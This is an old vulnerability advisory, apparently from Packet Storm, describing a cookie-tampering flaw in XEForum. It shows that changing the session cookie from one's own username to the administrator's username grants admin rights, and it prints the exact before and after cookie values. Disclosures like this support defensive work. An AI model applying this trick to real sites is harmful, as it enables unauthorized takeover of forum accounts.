XEForum suffers from a privilege escalation vulnerability via cookie modification.
9a75d656d5f3dff13562550554751fe24e857821970ec4e1ab63eb54fa7b8259-------------------------------------------------------------------- XEForum Cookie Modification Privilege Escalation Vulnerability
--------------------------------------------------------------------
Vulnerable product: XEForum
Vendor: https://www.xeforum.com/
Date:
--------------------
Found: Jun 26, 2007
Vulnerability:
--------------------
XeForum contains a flaw that may allow a remote attacker to gain administrative privileges.
Modifying contained cookie you can change of session and to even enter like administrator.
Cookie:
-----------------------------------
: Cookie: xeforum="Your Username" :
-----------------------------------
change to:
------------------------------------
: Cookie: xeforum="Admin Username" :
------------------------------------
Credit:
--------------------
Firewall
Firewall of Peru
Firewall@hotmail.com
Greetz to Swp-Scene And Revolutionz
https://4firewall.uni.cc
--------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed